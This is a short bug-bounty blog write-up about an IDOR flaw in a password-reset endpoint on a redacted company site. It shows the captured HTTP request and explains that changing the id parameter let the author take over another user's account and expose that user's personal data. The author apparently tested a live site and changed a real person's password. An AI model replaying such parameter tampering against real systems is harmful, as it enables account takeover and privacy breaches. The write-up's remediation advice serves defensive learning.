.png)
3 years ago
234 BOOK THIS SPACE FOR AD
ARTICLE ADI have been learning web penetration testing intermittently for a year — by watching tutorials and reading write-ups. However, I found nothing after testing here and there on several websites. I do have a programming background, but not in web development, so all the things went uneasy… (but I am still the lucky one xD)
A few days ago, a company that I have a membership with was about to launch a website for subscription management. The flame in me reignited. I gave it a try.
I went to reset my password. A link was sent to my email.
Side note: At the time I wrote the post, I noticed that the parametersecret was encrypted using password_hash in PHP and I tried several combinations, no luck. (Kindly tell me if you find it!)
An interesting thing happened. When I opened the link and submitted my new password, I caught something in my Burp Suite:
POST /reactivate/password HTTP/2
Host: redacted.com
Cookie: <some-cookies>
Content-Length: 301
Sec-Ch-Ua: “Chromium”;v=”91", “ Not;A Brand”;v=”99"
Accept: application/json, text/javascript, */*; q=0.01
X-Csrf-Token: 3C7sNXdSzWhzSEvJ6KChsRKnG3yfquLS3n8tL1HL
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://redacted.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://redacted.com/verify/reactivate?expires=1625067966&id=201&secret=%242y%2410%24QgG8NmTIr0p6EOjyqU%2Fz2er7Mt4rzRV8mWtbGeLllj8t.oeesFWDC&signature=90b782653962ac4501ac10408834b172c954aeb6d5836f196c7c073d9d6c0168
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
id=201&password=newpassword&confirm_password=newpassword
I recognised theidparameter —that’s my id. Hmmm, maybe an IDOR? I then changed 201 to 200 and boom! A green tick was shown.
I was redirected to the dashboard of the victim and his/her password got changed. Email, real name and phone numbers were leaked!
When changing the password of a user, the server uses an identifier (id in this case) from the client side for direct access to an object in its internal database without checking for access control or authentication. This leads to account takeover/privilege escalation and causes hazardous impacts to the owner.
— modified from Wikipedia
Never trust any inputs from the users, validate them every time.Minimize the data being sent to the server.Thanks for reading!
Bengali (Bangladesh) · 
English (United States) ·